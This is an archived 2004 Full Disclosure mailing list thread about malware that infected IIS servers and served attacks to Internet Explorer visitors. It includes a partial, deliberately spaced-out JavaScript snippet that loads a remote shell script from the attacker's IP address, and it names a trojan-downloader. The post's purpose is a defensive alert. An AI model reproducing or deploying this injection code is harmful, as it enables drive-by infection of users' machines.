Full Disclosure mailing list archives
RE: New malware to infect IIS and from there jump to clients
From: "joe" <mvp () joeware net>
Date: Fri, 25 Jun 2004 09:47:37 -0400
For the IIS side.... http://www.microsoft.com/security/incident/download_ject.mspx Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows. Important Customers who have deployed Windows XP Service Pack 2 RC2 are not at risk. Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code. -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Peter Kruse Sent: Thursday, June 24, 2004 7:22 PM To: full-disclosure () lists netsys com Subject: [Full-disclosure] New malware to infect IIS and from there jump to clients Hi all, This is a heads up. A new malware has been reported from several sources so it appears to be fairly widespread already. The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers was compromised in the first place is unfortunately still unknown (any info on that would be appreciated). The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http:// 217.107.218.147/xxx.html that contains the following code: <script language="Javascript"> function InjectedDuringRedirection(){ showModalDialog('md.htm', window, "dialog Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width :1\;").location= " java script:'<SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\'> <\ /script>'"; [snip - you get the picture, right?] I had to put in some spaces to get past trivial content filtering.
From that point it will try to run the malware in a 1x1 dialogbox in the
following order: shellscript_loadxxx.js shellxxx.js The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a trojan-downloader and run it. Consider to deny access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected. Further information can be found in the daily log from SANS: http://isc.sans.org/ Regards Peter Kruse http://www.csis.dk _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Evidence of a ISC being hacked?, (continued)
- Re: Evidence of a ISC being hacked? VX Dude (Jun 24)
- Re: Evidence of a ISC being hacked? Valdis . Kletnieks (Jun 24)
- Re: [FD] Evidence of a ISC being hacked? Thomas Binder (Jun 24)
- Re: Evidence of a ISC being hacked? Eric Paynter (Jun 24)
- New malware to infect IIS and from there jump to clients Peter Kruse (Jun 24)
- Re: New malware to infect IIS and from there jump to clients Nick FitzGerald (Jun 24)
- SV: New malware to infect IIS and from there jump to clients Peter Kruse (Jun 24)
- Re: SV: New malware to infect IIS and from there jump to clients Duncan Hill (Jun 25)
- Re: SV: New malware to infect IIS and from there jump to clients Nasir Ghaznavi (Jun 25)
- Re: Evidence of a ISC being hacked? VX Dude (Jun 24)
- Re: New malware to infect IIS and from there jump to clients Gary Flynn (Jun 25)
- RE: New malware to infect IIS and from there jump to clients joe (Jun 25)
- Re: New malware to infect IIS and from there jump to clients insecure (Jun 25)
- Re: New malware to infect IIS and from there jump to clients Matt Power (Jun 27)
- Re: Evidence of a ISC being hacked? VX Dude (Jun 24)
- Re: Evidence of a ISC being hacked? Valdis . Kletnieks (Jun 25)
- IE exploit runs code from graphics? Larry Seltzer (Jun 24)
- RE: IE exploit runs code from graphics? Heather M. Guse Bryan (Jun 24)
- Re: IE exploit runs code from graphics? Nick FitzGerald (Jun 24)
- RE: IE exploit runs code from graphics? Larry Seltzer (Jun 24)
- Re: IE exploit runs code from graphics? Aditya, ALD [ Aditya Lalit Deshmukh ] (Jun 26)